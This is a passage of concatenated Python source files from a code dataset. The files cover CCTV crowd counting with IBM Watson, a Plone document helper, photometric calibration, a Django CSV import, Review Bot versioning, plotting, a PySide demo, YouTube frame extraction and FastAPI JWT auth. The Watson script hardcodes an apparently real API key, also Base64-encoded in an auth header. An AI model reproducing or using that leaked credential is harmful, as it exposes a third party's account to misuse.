isLog=False)\n","sub_path":"securityAnalysis/securities_analysis.py","file_name":"securities_analysis.py","file_ext":"py","file_size_in_byte":17598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28966019","text":"import cv2\nimport numpy as np\nimport requests\nimport json\nimport os\nfrom watson_developer_cloud import VisualRecognitionV3\nfrom database import cursor, db\nimport sched, time\n\n## DETAILS OF VISUAL RECOGNITION MODEL\nvisual_recognition = VisualRecognitionV3('2018-03-19',iam_apikey='YgNSrJcWFSrLlIkng2XsEmY6k-HIer3DShnSNeop8Fue')\n\n## SCHEDULAR FOR RUNNING THE NEXT LINE\ns = sched.scheduler(time.time, time.sleep)\n\n## TO CREATE PATH FOR SAVING THE IMAGES\ntry:\n if not os.path.exists('data'):\n os.makedirs('data')\nexcept OSError:\n print ('Error: Creating directory of data')\n\n## UPDATE FUNCTION\ndef autoupdate (sc):\n\n ## SELECT THE URL AND ID FROM DATABASE\n cctv_url = 'SELECT CCTV_URL, CCTV_ID FROM SCHEDULE'\n cursor.execute(cctv_url)\n result = cursor.fetchall()\n\n ## i DECLARED AS 0 , IT REPRESENTS THE ROWS\n i = 0\n\n ## WHILE LOOP \n while i < 41 :\n url_out = result[i][0]\n _id = result[i][1]\n print (url_out)\n print (_id)\n url = url_out\n print (url)\n img_request = requests.get(url)\n img_arr = np.array(bytearray (img_request.content), dtype= np.uint8)\n img = cv2.imdecode(img_arr,-1)\n name = './data/img' + '.jpg'\n cv2.imwrite(name,img)\n ## IMAGE IS CAPTURED\n\n ## OPENED IN FILE FORMAT\n with open(name, 'rb') as images_file:\n\n ## PUT IN OKAY OR NOT OKAY MODEL\n classes = visual_recognition.classify( images_file, threshold='0.6', classifier_ids='Bus_View_932757643').get_result()\n visual =json.loads(json.dumps(classes, indent=2))\n preds=visual['images'][0]['classifiers'][0]['classes'][0]['class']\n\n ## IF NOT OKAY DECLARED AS CROWDED\n if (preds) == 'Not Okay':\n count = -1\n print(count)\n\n ## IF OKAY PUT INTO HUMAN DETECTION TO GET THE HUMAN COUNT\n else:\n url1 = \"https://gateway.watsonplatform.net/visual-recognition/api/v4/analyze?version=2019-02-11\"\n payload = {'features': 'objects','collection_ids': '465fd7ad-785a-4dab-b64b-08a937c9adcb','threshold': '0.15'}\n files = [('images_file', open(name,'rb'))]\n headers = {'Authorization': 'Basic YXBpa2V5OllnTlNySmNXRlNyTGxJa25nMlhzRW1ZNmstSEllcjNEU2huU05lb3A4RnVl'}\n response = requests.request(\"POST\", url1, headers=headers, data = payload, files = files)\n json_con = json.loads(response.text.encode('utf8'))\n detect = json_con['images'][0]['objects']['collections'][0]['objects']\n count = len(detect)\n print(count)\n \n ## TAKES TO THE NEXT ROW\n i += 1\n print ('loop'+ str(i))\n\n ## UPDATE THE COUNT TO SQL DATABASE\n update_stat = \"UPDATE SCHEDULE SET COUNT = %s WHERE CCTV_ID = %s\"\n params = (count,_id)\n print(params)\n cursor.execute(update_stat,params)\n db.commit()\n print('Upadting SQL')\n\n ## EXIST WHEN THE ROWS ARE COMPLTED\n print('exist')\n\n ## AFTER EVERY 30 SECS THE PROGRAM IS RUN AGAIN\n s.enter(30, 1, autoupdate, (sc,))\n\n## AFTER 0 SECS NEXT ROW OF THE TABLE IS EXCECUTED\ns.enter(0, 1, autoupdate, (s,))\ns.run()","sub_path":"recognition_final.py","file_name":"recognition_final.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"525751425","text":"# -*- coding: utf-8 -*-\n\nfrom collective.documentgenerator.helper.base import DisplayProxyObject\nfrom collective.documentgenerator.helper.base import 
DocumentGenerationHelperView\nfrom collective.documentgenerator.interfaces import IFieldRendererForDocument\n\nfrom zope.component import getMultiAdapter\n\n\nclass ATDocumentGenerationHelperView(DocumentGenerationHelperView):\n \"\"\"\n Archetypes implementation of document generation helper methods.\n \"\"\"\n\n def display(self, field_name, context=None, no_value=''):\n if context is None:\n context = self.real_context\n\n if self.check_permission(field_name, context):\n field_renderer = self.get_AT_field_renderer(field_name, context)\n display_value = field_renderer.render(no_value=no_value)\n else:\n display_value = u''\n\n return display_value\n\n def check_permission(self, field_name, context):\n return bool(context.getField(field_name).checkPermission('r', context))\n\n def get_AT_field_renderer(self, field_name, context):\n field = context.getField(field_name)\n widget = field.widget\n renderer = getMultiAdapter((field, widget, context), IFieldRendererForDocument)\n\n return renderer\n\n def display_date(self, field_name, context=None, long_format=None, time_only=None, custom_format=None):\n date_field = self.context.getField(field_name)\n date = date_field.get(self.context)\n if not custom_format:\n # use toLocalizedTime\n formatted_date = self.plone.toLocalizedTime(date, long_format, time_only)\n else:\n formatted_date = date.strftime(custom_format)\n\n return formatted_date\n\n def display_voc(self, field_name, context=None, separator=', '):\n if context is None:\n context = self.real_context\n\n display_value = context.restrictedTraverse('@@at_utils').translate\n\n field = context.getField(field_name)\n voc = field.Vocabulary(context)\n raw_values = field.get(context)\n values = [display_value(voc, val) for val in raw_values]\n display = separator.join(values)\n\n return display\n\n def display_text(self, field_name, context=None):\n if not self.appy_renderer:\n return ''\n\n if context is None:\n context = self.real_context\n\n html_field = self.context.getField(field_name)\n html_text = html_field.get(context)\n display = self.appy_renderer.renderXhtml(html_text)\n return display\n\n def display_list(self, field_name, separator=', '):\n field = self.real_context.getField(field_name)\n values = field.get(self.real_context)\n display = separator.join(values)\n\n return display\n\n def list(self, field_name):\n field = self.real_context.getField(field_name)\n values = field.get(self.real_context)\n\n return values\n\n\nclass ATDisplayProxyObject(DisplayProxyObject):\n \"\"\"\n Archetypes implementation of DisplayProxyObject.\n \"\"\"\n\n def is_field(self, attr_name):\n is_field = bool(self.context.getField(attr_name))\n return is_field\n","sub_path":"src/collective/documentgenerator/helper/archetypes.py","file_name":"archetypes.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"639098073","text":"# -*- coding: utf-8 -*-\n\"\"\" \n\nCreated on 01/12/17\n\nAuthor : Carlos Eduardo Barbosa\n\nDetermination of solution for photometric calibration.\n\n\"\"\"\nfrom __future__ import print_function, division\n\nimport os\nimport sys\nimport yaml\nfrom datetime import date\n\nimport numpy as np\nimport astropy.units as u\nfrom astropy.io import ascii\nfrom astropy.table import Table, vstack\nimport speclite.filters\nimport pymc3 as pm\n\nimport context\n\ndef load_java_system(version):\n \"\"\" Use speclite to load Javalambre's SPLUS filters for convolution. 
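\n\n    A minimal usage sketch (here flux/wave stand in for a spectrum loaded\n    elsewhere, and version must name a directory under tables/filter_curves):\n\n        java = load_java_system(version)\n        mags = java.get_ab_magnitudes(flux, wave, mask_invalid=True)\n\n    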
\"\"\"\n tables_dir = os.path.join(os.path.split(os.path.realpath(__file__))[0],\n \"tables\")\n filters_dir = os.path.join(tables_dir, \"filter_curves\", version)\n ftable = ascii.read(os.path.join(tables_dir, \"filter_lam_filename.txt\"))\n filternames = []\n for f in ftable:\n filtname = f[\"filter\"]\n fname = os.path.join(filters_dir, f[\"filename\"])\n fdata = np.loadtxt(fname)\n fdata = np.vstack(((fdata[0,0]-1, 0), fdata, (fdata[-1,0]+1, 0)))\n w = fdata[:,0] * u.AA\n response = np.clip(fdata[:,1], 0., 1.)\n speclite.filters.FilterResponse(wavelength=w,\n response=response, meta=dict(group_name=\"java\",\n band_name=filtname.upper()))\n filternames.append(\"java-{}\".format(filtname))\n java = speclite.filters.load_filters(*filternames)\n return java\n\ndef get_splus_magnitudes(stars, library, filter_curves):\n \"\"\" Obtain magnitude of stars used in the calibration in the\n S-PLUS system. \"\"\"\n stds_dir = os.path.join(os.path.split(os.path.realpath(__file__))[0],\n \"tables/stdstars\", library)\n java = load_java_system(filter_curves)\n mags = {}\n for star in stars:\n specfile = os.path.join(stds_dir, \"f{}.dat\".format(star))\n if not os.path.exists(specfile):\n continue\n wave, flux = np.loadtxt(specfile, usecols=(0,1), unpack=True)\n wave = wave * u.AA\n flux = flux * (10 ** -16) * u.erg / u.cm / u.cm / u.s / u.AA\n m = java.get_ab_magnitudes(flux, wave, mask_invalid=True)\n mags[star] = m\n return mags\n\ndef single_band_calib(data, outdb, redo=False):\n \"\"\" Determining zero points for single band data.\n \"\"\"\n if os.path.exists(outdb) and not redo:\n return\n data = data.to_pandas()\n nights = list(data.DATE.unique())\n nights_lookup = dict(zip(nights, range(len(nights))))\n data[\"night\"] = data.DATE.copy()\n data['night'] = data.night.replace(nights_lookup).values\n N = len(nights)\n with pm.Model():\n # Hyperpriors\n Mzp = pm.Normal('Mzp', mu=20., sd=2)\n Szp = pm.HalfCauchy('Szp', 5)\n Mkappa = pm.Normal('Mkappa', mu=0., sd=1)\n Skappa = pm.HalfCauchy(r'Skappa', 5)\n # Randon intercepts\n zp = pm.Cauchy(\"zp\", alpha=Mzp, beta=Szp, shape=N)\n # Common slope\n kappa = pm.Cauchy(r\"kappa\", alpha=Mkappa, beta=Skappa, shape=N)\n # Model error\n eps = pm.HalfCauchy(r\"eps\", 5)\n # Expected value\n linear_regress = zp[data[\"night\"]] - \\\n kappa[data[\"night\"]] * data[\"AIRMASS\"]\n pm.Cauchy('y', alpha=linear_regress, beta=eps,\n observed=data[\"DELTAMAG\"])\n trace = pm.sample(nchains=4, njobs=4)\n pm.save_trace(trace, outdb, overwrite=True)\n summary = []\n for night, idx in nights_lookup.items():\n t = Table([[night], [np.mean(trace[\"zp\"][:, idx])],\n [np.std(trace[\"zp\"][:, idx])],\n [np.mean(trace[\"kappa\"][:, idx])],\n [np.std(trace[\"kappa\"][:, idx])]],\n names=[\"date\", \"zp\", \"zperr\", \"kappa\", \"kappaerr\"])\n summary.append(t)\n summary = vstack(summary)\n summary.write(\"{}.txt\".format(outdb), overwrite=True, format=\"ascii\")\n # Saving dictionary with indices to allow use of traces\n root, band = os.path.split(outdb)\n nights_lookup = {k.decode(): v for k, v in nights_lookup.items()}\n with open(os.path.join(root, \"index_night_{}.yaml\".format(band)),\n \"w\") as f:\n yaml.dump(nights_lookup, f, default_flow_style=False)\n\n return\n\ndef main():\n config_files = [_ for _ in sys.argv if _.endswith(\".yaml\")]\n if len(config_files) == 0:\n config_files = [\"config_mode5.yaml\"]\n print(\"Configuration file not set. 
Using default mode 5.\")\n for filename in config_files:\n with open(filename) as f:\n config = yaml.load(f)\n calib_dir = os.path.join(config[\"main_dir\"], \"calib\")\n phot_file = os.path.join(calib_dir,\n \"phottable_{}.fits\".format(config[\"name\"]))\n phot = Table.read(phot_file)\n # Setting up the output directory\n today = date.today()\n outdir = os.path.join(calib_dir, \"{}-{}\".format(\n config[\"name\"], today.strftime(\"%Y-%m-%d\")))\n ########################################################################\n # Remove flagged stars\n flagged_stars = [_.lower().replace(\" \", \"\") for _ in config[\n \"flagged_stars\"]]\n badidx = []\n for fstar in flagged_stars:\n idx = np.where(phot[\"STAR\"]==fstar)[0]\n badidx.append(idx)\n badidx = np.hstack(badidx)\n goodidx = np.arange(len(phot))\n goodidx = np.delete(goodidx, badidx)\n phot = phot[goodidx]\n ########################################################################\n # Remove saturated stars\n idx = np.where(phot[\"FLAGS\"] <= 2)[0]\n phot = phot[idx]\n ########################################################################\n # Add columns to the photometry table containing the model magnitudes\n stars = set(phot[\"STAR\"])\n model_mags = get_splus_magnitudes(stars, config[\"stdlib\"],\n config[\"filters_version\"])\n modelmag = np.zeros(len(phot)) * np.nan\n for star in stars:\n if star not in model_mags:\n print(\"Star not found in database: {}\".format(star))\n continue\n for band in context.bands:\n fname = \"java-{}\".format(band)\n idx = np.where((phot[\"STAR\"]==star) & (phot[\"FILTER\"]==band))[0]\n modelmag[idx] = float(model_mags[star][fname])\n phot[\"MODELMAG\"] = modelmag\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n for flux in config[\"sex_phot\"]:\n p = Table(phot, copy=True)\n p[\"OBSMAG\"] = -2.5 * np.log10(p[flux] / p[\"EXPTIME\"])\n p[\"DELTAMAG\"] = p[\"MODELMAG\"] - p[\"OBSMAG\"]\n ####################################################################\n # Removing problematic lines\n p = p[np.isfinite(p[\"DELTAMAG\"])]\n dbs_dir = os.path.join(outdir, flux)\n if not os.path.exists(dbs_dir):\n os.mkdir(dbs_dir)\n for band in context.bands:\n print(filename, band)\n idx = np.where(band == p[\"FILTER\"])[0]\n if len(idx) == 0:\n continue\n outdb = os.path.join(dbs_dir, band)\n data = p[idx]\n data.write(os.path.join(dbs_dir, \"phot_{}.fits\".format(band)),\n overwrite=True)\n single_band_calib(data, outdb, redo=True)\n\nif __name__ == \"__main__\":\n main()","sub_path":"splus-stdcal/stdcal.py","file_name":"stdcal.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472705445","text":"import csv\nfrom django.core.management.base import BaseCommand\nfrom django.core.management.base import CommandError\nfrom django.utils.encoding import smart_str\n\nfrom unit.models import Component\n\n\n# Import units from a CSV file. 
Will update existing records\n# Run:\n# python manage.py import_units_from_csv C:\\Users\\Pete\\Desktop\\units.csv\n\n\nSILENT, NORMAL, VERBOSE, VERY_VERBOSE = 0, 1, 2, 3\n\nclass Command(BaseCommand):\n\targs = \"\"\n\thelp = \"Imports units from a local CSV file.\"\n\n\tdef handle(self, *args, **options):\n\t\tverbosity = int(options.get(\"verbosity\", NORMAL))\n\n\t\tif args:\n\t\t\tfile_path = args[0]\n\t\telse:\n\t\t\traise CommandError(\"Pass a path to a CSV file\")\n\n\t\tif verbosity >= NORMAL:\n\t\t\tprint('----Units Imported----')\n\n\t\twith open(file_path) as f:\n\t\t\treader = csv.reader(f)\n\n\t\t\tfor part_name, part_number, specification, RE_first_name, RE_last_name, supplier, SCA_first_name, SCA_last_name in reader:\n\t\t\t\tcomponent, created = Component.objects.update_or_create(\n\t\t\t\t\tpart_name = part_name,\n\t\t\t\t\tpart_number = part_number,\n\t\t\t\t\tspecification = specification,\n\t\t\t\t\tRE_first_name = RE_first_name,\n\t\t\t\t\tRE_last_name = RE_last_name,\n\t\t\t\t\tsupplier = supplier,\n\t\t\t\t\tSCA_first_name = SCA_first_name,\n\t\t\t\t\tSCA_last_name = SCA_last_name\n\t\t\t\t\t)\n\t\t\t\tif verbosity >= NORMAL:\n\t\t\t\t\tprint(\"-- %s. Record created: %s\" % (smart_str(component.part_number), created))","sub_path":"unit/management/commands/import_units_from_csv.py","file_name":"import_units_from_csv.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"203153044","text":"\n#: The version of Review Bot.\n#:\n#: This is in the format of:\n#:\n#:     (Major, Minor, Micro, Patch, alpha/beta/rc/final, Release Number, Released)\n#:\nVERSION = (3, 2, 1, 0, 'alpha', 0, False)\n\n\ndef get_version_string():\n    \"\"\"Return the version of Review Bot.\n\n    Returns:\n        unicode:\n        The full version.\n    \"\"\"\n    version = '%s.%s' % (VERSION[0], VERSION[1])\n\n    if VERSION[2] or VERSION[3]:\n        version = '%s.%s' % (version, VERSION[2])\n\n    if VERSION[3]:\n        version = '%s.%s' % (version, VERSION[3])\n\n    tag = VERSION[4]\n\n    if tag != 'final':\n        if tag == 'rc':\n            version = '%s RC%s' % (version, VERSION[5])\n        else:\n            version = '%s %s %s' % (version, tag, VERSION[5])\n\n    if not is_release():\n        version += ' (dev)'\n\n    return version\n\n\ndef get_package_version():\n    \"\"\"Return the package version of Review Bot.\n\n    This is a simplified version string which is used when building a package.\n\n    Returns:\n        unicode:\n        The version to use for the package.\n    \"\"\"\n    version = '%d.%d' % (VERSION[0], VERSION[1])\n\n    if VERSION[2] or VERSION[3]:\n        version = '%s.%s' % (version, VERSION[2])\n\n    if VERSION[3]:\n        version = '%s.%s' % (version, VERSION[3])\n\n    tag = VERSION[4]\n\n    if tag != 'final':\n        if tag == 'alpha':\n            tag = 'a'\n        elif tag == 'beta':\n            tag = 'b'\n\n        version = '%s%s%s' % (version, tag, VERSION[5])\n\n    return version\n\n\ndef is_release():\n    \"\"\"Return whether the current version is a release.\n\n    Returns:\n        boolean:\n        True if the current version of Review Bot is a released package.\n    \"\"\"\n    return VERSION[6]\n\n\n#: An alias for the version information from :py:data:`VERSION`.\n#:\n#: This does not include the last entry in the tuple (the released state).\n__version_info__ = VERSION[:-1]\n\n#: An alias for the version used for the Python package.\n__version__ = 
get_package_version()\n","sub_path":"bot/reviewbot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"484718923","text":"#!/usr/bin/env python\n\nfrom typing import List, Tuple\nfrom typing import Optional\nfrom typing import Type, Any\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport re\nfrom pathlib import Path\n\nimport bdgtools.util as butil\n\ndef eigenval(evals, ax=None, eval_props=None, cums_props=None,\n legend=True, legend_props=None):\n evals = abs(evals)\n cumsum = np.cumsum(evals)\n totsum = np.sum(evals)\n cumsum /= totsum\n\n if ax is None:\n fig, ax = plt.subplots()\n else:\n fig = ax.get_figure()\n\n eval_props_tmp = {\n 'color': '#396ab1',\n 'marker': 'o',\n 'markersize': 3,\n 'linewidth': 0,\n }\n if eval_props is not None:\n eval_props_tmp.update(eval_props)\n\n cums_props_tmp = {\n 'color' : '#da7c30',\n 'marker': 'o',\n 'markersize': 3,\n 'linewidth': 0,\n }\n if cums_props is not None:\n cums_props_tmp.update(cums_props)\n\n axr = ax.twinx()\n\n index = np.linspace(1, len(evals), len(evals))\n evals_line, = ax.plot(index, evals, **eval_props_tmp)\n cums_line, = axr.plot(index, cumsum, **cums_props_tmp)\n\n\n\n if legend:\n legend_props_tmp = {\n 'handles': [evals_line, cums_line],\n 'labels': [r'$y(x_i)$', r'$\\frac{1}{n}\\sum_{j=1}^{i} y(x_j)$'],\n 'fontsize': 4,\n 'loc': (1.3, 0.6),\n 'frameon': False,\n }\n if legend_props is not None:\n legend_props_tmp.update(legend_props)\n\n ax.legend(\n **legend_props_tmp\n )\n axr.set(**{\n 'ylim': (0, 1.1),\n })\n\n return (fig, ax, axr, evals_line, cums_line)\n\n\ndef histogram(x, data=None, mean=None, std=None,\n ax=None,\n line_props={}, fill_props={}, ax_props={}):\n \"\"\"data: List of arrays\n \"\"\"\n\n # If no axes is given, create a new one\n if ax is None:\n ax = plt.gca()\n\n # Todo: Implement other plotting options\n if mean is not None:\n ax.plot(x, mean, **line_props)\n if std is not None:\n lowerbound = mean - std\n lowerbound[lowerbound < 0] = 0\n ax.fill_between(\n x,\n lowerbound,\n mean + std,\n **fill_props)\n\n ax.set(**ax_props)\n\n\ndef plot(y, x=None, ax=None):\n \"\"\"data: List of arrays\n \"\"\"\n # If no axes is given, create a new one\n if ax is None:\n ax = plt.gca()\n\n if x is None:\n ax.plot(y)\n plt.show()\n\nif __name__ == \"__main__\":\n import argparse\n import warnings\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('command')\n\n parser.add_argument(\n '-f', '--FILE', metavar='',\n type=str,\n help='Input path and filename.',\n default=None,\n )\n\n parser.add_argument(\n '-o', '--OUTPUT', metavar='',\n type=str,\n help='Output path and filename.',\n default=None,\n )\n\n parser.add_argument(\n '-warn', '--WARNINGS',\n action='store_true',\n help='Enable python interpreter related warnings.',\n default=False,\n )\n\n parser.add_argument(\n '-full', '--FULL',\n action='store_true',\n help='Enable printing of full instead of truncated list-like \\\n objects in same cases.',\n default=False,\n )\n\n parser.add_argument(\n '-l', '--STRINGS', metavar='<[str, ...]>',\n nargs='+',\n type=str,\n help = 'List of strings.',\n default = None\n )\n\n parser.add_argument(\n '-mark', '--MARK', metavar='',\n type=str,\n help='String inserted in output file at truncation points.',\n default=None,\n )\n\n parser.add_argument(\n '-res', '--RESIDUE', metavar='',\n type=str,\n help='String inserted in residue column of PDB file.',\n 
default=None,\n    )\n\n    args = parser.parse_args()\n\n    warn = args.WARNINGS\n    if not warn:\n        warnings.filterwarnings('ignore')\n\n    command = args.command\n    infile = args.FILE\n    outfile = args.OUTPUT\n\n    if command == \"histogram\":\n        l = args.STRINGS\n        mark = args.MARK\n        histogram(infile, l, outfile, mark)\n\n    if command == \"plot\":\n        f = Path(args.FILE)\n\n        if f.suffix == '.xvg':\n            options = {\n                \"comments\": [\"#\", \"@\", \"%\"],\n                \"usecols\": [1],\n            }\n\n            file_ = butil.load_file(f, **options)\n            plot(file_)\n","sub_path":"bdgtools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"33405171","text":"\"\"\" An example PySide application. \"\"\"\n\n\nimport PySide.QtGui as QtGui\n\nfrom enthought.traits.api import Int, Str\n\n\nclass MainWindow(QtGui.QMainWindow):\n    \"\"\" The main application window. \"\"\"\n\n    def __init__(self, parent=None):\n        \"\"\" Constructor. \"\"\"\n\n        super(MainWindow, self).__init__(parent)\n\n        self.setMenuBar(self._create_menu_bar())\n        self.setCentralWidget(self._create_example_list_widget())\n\n        return\n\n    #### Private protocol ######################################################\n\n    def _create_example_list_widget(self):\n        \"\"\" Factory method for the example list widget. \"\"\"\n\n        list_widget = QtGui.QListWidget(self)\n        icon = QtGui.QIcon('bullet-yellow.png')\n\n        QtGui.QListWidgetItem(icon, 'Oak', list_widget)\n        QtGui.QListWidgetItem(icon, 'Fir', list_widget)\n        QtGui.QListWidgetItem(icon, 'Pine', list_widget)\n\n        return list_widget\n\n    def _create_menu_bar(self):\n        \"\"\" Factory method for the menu bar. \"\"\"\n\n        menu_bar = QtGui.QMenuBar(self)\n\n        # Actions.\n        quit_action = QtGui.QAction(self)\n        quit_action.setText('&Quit')\n        quit_action.triggered.connect(self.close)\n\n        # Menus.\n        file_menu = QtGui.QMenu(menu_bar)\n        file_menu.setTitle('&File')\n        menu_bar.addMenu(file_menu)\n\n        # Populate the menus with the actions!\n        file_menu.addAction(quit_action)\n\n        return menu_bar\n\n\ndef main(argv):\n    \"\"\" Entry point. 
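Standard Qt bootstrap: construct the QApplication, show the main window,\n    then block in the event loop via exec_() until the user quits.\n\n    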
\"\"\"\n\n application = QtGui.QApplication(argv)\n\n main_window = MainWindow()\n main_window.show()\n \n application.exec_()\n\n return\n\n\nif __name__ == '__main__':\n import sys; sys.exit(main(sys.argv))\n\n#### EOF ######################################################################\n","sub_path":"PySide/pyside_application.py","file_name":"pyside_application.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534409575","text":"import cv2\nimport os\nimport random\nfrom subprocess import call\nimport pickle\n\noutputResultPath = './transcode/'\nbasePath = './RealEstate10K/'\n\n# set of videos that were not found\nnotFoundVideosPath = \"./downloaded/notFound.pkl\"\n\ndef loadNotFoundVideos():\n if os.path.exists(notFoundVideosPath):\n with open(notFoundVideosPath, 'rb') as f:\n return pickle.load(f)\n else:\n return set()\n\nnotFoundVideos = loadNotFoundVideos()\n\nprocessedTxtFilesPath = \"./processedTxtFiles.pkl\"\n\ndef loadProcessedTxtFiles():\n if os.path.exists(processedTxtFilesPath):\n with open(processedTxtFilesPath, 'rb') as f:\n return pickle.load(f)\n else:\n return set()\n\n# These are the txt files that were SUCCESSFULLY processed\n# This is useful to create a \"golden\" record of the dataset\nprocessedTxtFiles = loadProcessedTxtFiles()\n\ndef downloadVideo(videoPathURL, notFoundVideos):\n youtubeIDOffset = videoPathURL.find(\"/watch?v=\") + len('/watch?v=')\n\n youtubeID = videoPathURL[youtubeIDOffset:]\n targetPath = \"./downloaded/{}\".format(youtubeID)\n \n if youtubeID in notFoundVideos:\n return targetPath, \"DOWNLOAD_ERROR\", notFoundVideos, youtubeID\n \n if os.path.exists(targetPath):\n print('Skipped {}, warning EXISTS'.format(targetPath))\n return targetPath, False, notFoundVideos, youtubeID\n\n return_code = call([\"youtube-dl\", \"-f\", \"bestvideo[height<=480]\", videoPathURL, \"-o\", targetPath, \"--cookies\", \"./cookies.txt\" ])\n error = False if return_code == 0 else \"DOWNLOAD_ERROR\"\n \n if \"DOWNLOAD_ERROR\" == error:\n notFoundVideos.add(youtubeID)\n with open(notFoundVideosPath, 'wb') as f:\n pickle.dump(notFoundVideos, f)\n\n return targetPath, error, notFoundVideos, youtubeID\n\ndef getBestMatchingFrames(frameTimeStamp, case, maxFrameMatchingDistanceInNS=8000):\n matches = []\n for caseIdx, c in enumerate(case):\n distance = abs(c['timeStamp'] - frameTimeStamp)\n if distance < maxFrameMatchingDistanceInNS:\n #print(c['timeStamp'], frameTimeStamp)\n #print('case index', caseIdx, 'distance',distance)\n matches.append({\n 'caseIdx': caseIdx,\n 'distance': distance,\n })\n\n matches.sort(key=lambda x: x['distance'])\n return matches\n\nfor rootPath in os.listdir(basePath):\n if 'download' in rootPath:\n continue\n\n subRootPath = os.path.join(basePath, rootPath)\n for subPath in os.listdir(subRootPath):\n dataFilePath = os.path.join(subRootPath, subPath)\n\n case = []\n\n with open(dataFilePath) as f:\n videoPathURL = f.readline().rstrip()\n # process all the rest of the lines \t\n for l in f.readlines():\n line = l.split(' ')\n\n timeStamp = int(line[0])\n intrinsics = [float(i) for i in line[1:7]]\n pose = [float(i) for i in line[7:19]]\n case.append({\n 'timeStamp': timeStamp, \n 'intrinsics': intrinsics,\n 'pose': pose})\n\n downloadedVideoPath, error, notFoundVideos, youtubeID = downloadVideo(videoPathURL, notFoundVideos)\n \n if error != False:\n print('Skipped {}, error {}'.format(downloadedVideoPath, error))\n continue\n\n # build out the 
specific frames for the case\n video = cv2.VideoCapture(downloadedVideoPath) \n video.set(cv2.CAP_PROP_POS_MSEC, 0)\n #import pdb; pdb.set_trace()\n\n while video.isOpened(): \n frameOK, imgFrame = video.read() \n if frameOK == False:\n print('video processing complete')\n break\n\n frameTimeStamp = (int)(round(video.get(cv2.CAP_PROP_POS_MSEC)*1000))\n\n matches = getBestMatchingFrames(frameTimeStamp, case, 1e9 / (2* video.get(cv2.CAP_PROP_FPS)))\n for match in matches:\n caseOffset = match['caseIdx']\n distance = match['distance']\n # match was successful, write frame\n imageOutputDir = os.path.join(outputResultPath, youtubeID)\n \n if not os.path.exists(imageOutputDir):\n os.makedirs(imageOutputDir)\n imageOutputPath = os.path.join(imageOutputDir, '{}.jpg'.format(case[caseOffset]['timeStamp']) )\n \n if not os.path.exists(imageOutputPath):\n print(\"Writing {} for frame {}, distance {}\".format(imageOutputPath, case[caseOffset]['timeStamp'], distance))\n cv2.imwrite(imageOutputPath, imgFrame)\n\n case[caseOffset]['imgPath'] = imageOutputPath\n \n # write the case file to disk\n processedTxtFiles.add(subPath)\n with open(processedTxtFilesPath, 'wb') as f:\n pickle.dump(processedTxtFiles, f)\n #caseFileOutputPath = os.path.join(imageOutputDir, 'case.pkl')\n #with open(caseFileOutputPath, 'wb') as f:\n # pickle.dump(case, f)\n","sub_path":"downloadAndProcess.py","file_name":"downloadAndProcess.py","file_ext":"py","file_size_in_byte":5068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467166580","text":"from fastapi_jwt_auth import AuthJWT\nfrom fastapi import APIRouter, Response, Depends\nfrom controller.UserController import UserCrud, UserFetch, UserLogic\nfrom schemas.users.RegisterSchema import RegisterSchema\nfrom schemas.users.UserSchema import UserLogin, UserOut, UserUpdate\nfrom config import conn_redis, ACCESS_EXPIRES, REFRESH_EXPIRES\nfrom typing import List\n\nclass JwtAuthToken:\n def __init__(self):\n self.jwt_auth = AuthJWT(None)\n\n def __call__(self):\n return self.jwt_auth\n\n\nrouter = APIRouter()\nauth_token = JwtAuthToken()\n\n@router.post('/register', status_code=201)\nasync def register(user: RegisterSchema):\n await UserCrud.create_user(**user.dict(exclude={'confirm_password'}))\n return {\"message\":\"email already register\"}\n\n@router.post('/login')\nasync def login(user: UserLogin, res: Response, Authorize: AuthJWT = Depends(auth_token)):\n user_exists = await UserFetch.filter_by_email(user.email)\n if (\n user_exists and\n UserLogic.check_user_password(password=user.password,hashed_pass=user_exists.password)\n ):\n access_token = Authorize.create_access_token(identity=user_exists.id,fresh=True)\n refresh_token = Authorize.create_refresh_token(identity=user_exists.id)\n\n return {\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n \"username\": user_exists.username\n }\n\n res.status_code = 422\n return {\"message\":\"Invalid credential\"}\n\n@router.post('/refresh-token')\nasync def refresh_token(Authorize: AuthJWT = Depends()):\n Authorize.jwt_refresh_token_required()\n\n user_id = Authorize.get_jwt_identity()\n new_token = Authorize.create_access_token(identity=user_id,fresh=False)\n return {\"access_token\": new_token}\n\n@router.delete('/access-token-revoke')\nasync def access_token_revoke(Authorize: AuthJWT = Depends()):\n Authorize.jwt_required()\n\n jti = Authorize.get_raw_jwt()['jti']\n conn_redis.setex(jti,ACCESS_EXPIRES,\"true\")\n return {\"message\":\"Access token 
